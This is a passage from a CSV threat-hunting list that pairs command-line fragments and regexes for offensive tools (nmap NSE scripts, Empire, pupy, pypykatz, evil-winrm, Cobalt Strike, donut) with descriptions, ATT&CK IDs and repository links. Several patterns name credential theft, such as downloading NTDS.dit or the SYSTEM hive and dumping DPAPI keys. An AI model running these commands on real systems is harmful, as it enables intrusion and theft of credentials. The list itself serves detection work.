Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-service-discovery.nse*",".{0,1000}\sdns\-service\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-srv-enum.nse*",".{0,1000}\sdns\-srv\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnsstager.py*",".{0,1000}\sdnsstager\.py.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "* -dns-tcp -nameserver * -dc-ip*",".{0,1000}\s\-dns\-tcp\s\-nameserver\s.{0,1000}\s\-dc\-ip.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* dns-update.nse*",".{0,1000}\sdns\-update\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-zeustracker.nse*",".{0,1000}\sdns\-zeustracker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-zone-transfer.nse*",".{0,1000}\sdns\-zone\-transfer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* docker-version.nse*",".{0,1000}\sdocker\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -domain * /dc * /service cifs /ptt*",".{0,1000}\s\-domain\s.{0,1000}\s\/dc\s.{0,1000}\s\/service\scifs\s\/ptt.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "* --domain * --kerberos*",".{0,1000}\s\-\-domain\s.{0,1000}\s\-\-kerberos.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/micahvandeusen/gMSADumper","1","0","N/A","N/A","3","224","40","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z" "* -Domain * -SMB1 *",".{0,1000}\s\-Domain\s.{0,1000}\s\-SMB1\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* domainDumper*",".{0,1000}\sdomainDumper.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - 
T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","0","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "* domainhunter *",".{0,1000}\sdomainhunter\s.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "* --domains ./domains.txt run*",".{0,1000}\s\-\-domains\s\.\/domains\.txt\srun.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "* domcachedump.py*",".{0,1000}\sdomcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* domcon-brute.nse*",".{0,1000}\sdomcon\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* domcon-cmd.nse*",".{0,1000}\sdomcon\-cmd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dome.py*",".{0,1000}\sdome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","451","62","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z" "* domino-enum-users.nse*",".{0,1000}\sdomino\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -DoNotPersistImmediately *",".{0,1000}\s\-DoNotPersistImmediately\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --dont-enumerate-acls *",".{0,1000}\s\-\-dont\-enumerate\-acls\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. 
All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "* --dont-enumerate-acls * -e *",".{0,1000}\s\-\-dont\-enumerate\-acls\s.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "* --donut --rehash n --silent -o /tmp/*",".{0,1000}\s\-\-donut\s\-\-rehash\sn\s\-\-silent\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* donut.c *",".{0,1000}\sdonut\.c\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* donut.exe *",".{0,1000}\sdonut\.exe\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. 
DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* donut.o *",".{0,1000}\sdonut\.o\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* --dotnetassembly * --amsi*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-amsi.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --appdomain *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-appdomain\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --assemblyargs 
*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-assemblyargs\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --mailslot*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-mailslot.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* --dotnetassembly * --pipe *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-pipe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "* -Downgrade False -Restore False -Impersonate True * -challange *",".{0,1000}\s\-Downgrade\sFalse\s\-Restore\sFalse\s\-Impersonate\sTrue\s.{0,1000}\s\-challange\s.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","0","N/A","N/A","10","1329","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z" "* download *\NTDS\NTDS.dit*",".{0,1000}\sdownload\s.{0,1000}\\NTDS\\NTDS\.dit.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "* download *\Windows\System32\config\SYSTEM*",".{0,1000}\sdownload\s.{0,1000}\\Windows\\System32\\config\\SYSTEM.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "* dpap-brute.nse*",".{0,1000}\sdpap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dpapi blob *.json *.dat*",".{0,1000}\sdpapi\sblob\s.{0,1000}\.json\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi credential *.json cred*",".{0,1000}\sdpapi\scredential\s.{0,1000}\.json\scred.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi masterkey /root/*",".{0,1000}\sdpapi\smasterkey\s\/root\/.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi minidump *.dmp*",".{0,1000}\sdpapi\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi prekey nt *S-1-5-21*",".{0,1000}\sdpapi\sprekey\snt\s.{0,1000}S\-1\-5\-21.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure 
Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi prekey password *",".{0,1000}\sdpapi\sprekey\spassword\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi prekey registry *.reg*",".{0,1000}\sdpapi\sprekey\sregistry\s.{0,1000}\.reg.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* dpapi securestring *.dat*",".{0,1000}\sdpapi\ssecurestring\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* Dpapi.ps1*",".{0,1000}\sDpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "* 